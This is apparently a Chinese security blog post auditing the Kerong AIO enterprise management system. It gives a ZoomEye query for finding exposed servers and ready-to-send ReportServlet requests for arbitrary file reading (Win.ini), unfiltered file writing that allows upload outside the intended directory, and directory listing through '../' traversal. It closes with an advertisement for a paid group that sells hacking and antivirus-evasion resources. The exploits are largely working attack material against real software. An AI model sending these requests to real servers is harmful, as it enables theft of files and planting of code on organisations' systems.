科荣AIO 企业⼀体化管理解决⽅案 通过ERPERP(进销存财务)、OAOA(办公⾃动化)、CRMCRM(客⼾关系管理)、UDPUDP(⾃定义平台),集电⼦商务平台、⽀付平台、ERP 平台、微信平台、移动APP 等解决了众多企业客⼾在管理过程中跨部⻔、多功能、需求多变等通⽤及个性化的问题。
ZoomEye: "changeAccount('8000')"
http://xxxxx/ReportServlet?operation=getPicFile&fileName=/DISKC/Windows/Win.ini
当operation
的值为getPicFile
,将传入的fileName
参数值进行判断是否以"/DISK"
开头并且不为空,如果不为空并以"/DISK"
开头进行截取如:/DISKC/Windows/Win.ini ==>DISKC/Windows/Win.ini
,接着判断是否"DISK"
开头,如果不为空并以"DISK"
开头又进行截取然后拼接:
如DISKC/Windows/Win.ini
==>C:/Windows/Win.ini
最后进行文件读取下载。
POST /ReportServlet?operation=saveFormatFile&fileName=demo.css&language= HTTP/1.1
Host: xxxxxx
Connection: lose
Content-Type: application/x-www-form-urlencoded
Content-Length: 2
demo
代码很直接获取POST输入流将内容写到指定fileName
中,由于fileName
未进行过滤导致可以进行越级上传。
http://xxxxxx/ReportServlet?operation=getFileList&path=../../../
直接将path
带入进行拼接然后遍历输出。
★
欢 迎 加 入 星 球 !
代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员
进成员内部群
星球的最近主题和星球内部工具一些展示
加入安全交流群
关 注 有 礼
还在等什么?赶紧点击下方名片关注学习吧!
推荐阅读